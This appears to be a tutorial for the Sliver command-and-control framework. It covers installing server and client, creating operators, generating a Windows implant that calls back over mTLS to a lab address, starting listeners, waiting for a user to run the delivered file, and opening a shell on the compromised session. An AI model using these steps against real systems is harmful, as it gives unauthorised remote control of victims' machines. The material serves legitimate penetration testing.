Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.
Documentation
Wiki: https://github.com/BishopFox/sliver/wiki/Getting-Started
GitHub: https://github.com/BishopFox/sliver/wiki
Features
- Dynamic code generation
- Compile-time obfuscation
- Multiplayer-mode
- Procedurally generated C2 over HTTP(S)
- DNS canary blue team detection
- Secure C2 over mTLS, HTTP(S), and DNS
- Fully scriptable
- Local and remote process injection
- Windows process migration
- Windows user token manipulation
- Anti-anti-anti-forensics
- Let’s Encrypt integration
- In-memory .NET assembly execution
Installation
Server
1. Download the server application
- wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip
2. Unzip the file
- unzip unzip sliver-server_linux.zip
3. Install required libraries
- sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64
4. Run the application
- sudo ./sliver-server
5. Now we need to create a session for a player to connect, and this play the player database
- new-player –operator vk9ops –lhost 192.168.0.21
- players
6. The file .cfg file created will need to be installed in the clients host, so save it for later
- [*] Saved new client config to: /home/vry4n/Desktop/vk9ops_192.168.0.21.cfg
7. Start Multiplayer mode
- multiplayer
Client
1. Download the client application
- wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip
2. Unzip the application
- unzip sliver-client_linux.zip
3. Install the required libraries
- sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64
4. Try to run the application
- sudo ./sliver-client
5. Copy the vk9ops_192.168.0.21.cfg file into /home/kali/.sliver-client/configs, from the server machine to the local machine
- sudo cp vk9ops_192.168.0.21.cfg /root/.sliver-client/configs
6. Try to run the application again
- sudo ./sliver-client
If you ever get communication error, the source of the issue might be that “multiplayer” has not been enabled at the sliver server console
How to use Sliver
1. See the help menu
- help
2. Display players’ database
- players
3. To create new players accounts, this can only be run from the Sliver server not the client
- new-player –operator <username> –lhost <DNS or IP of the server>
4. Display Sliver version
- version
5. We need to Generate an Implant (mtls, http, dns), this will generate a file saved at the location specified
generate Generate a sliver binary
MTLS
- generate –mtls 192.168.0.21 –save ./file.exe –os Windows
6. Now, we need to start the listener
http Start an HTTP listener
https Start an HTTPS listener
dns Start a DNS listener
mtls Start an mTLS listener
- mtls
- jobs
7. Deliver the file, and, wait for it to be executed by the user. Once executed, you will see a message on screen
8. Show all active sessions
- sessions -h
- sessions
9. To kill a session run
- session -k 1
10. Interact with a session
- sessions
- session -i 7
11. Running help you can see all the available commands to run
- help
12. Run some commands to test what you can do
- whoami
- info
- shell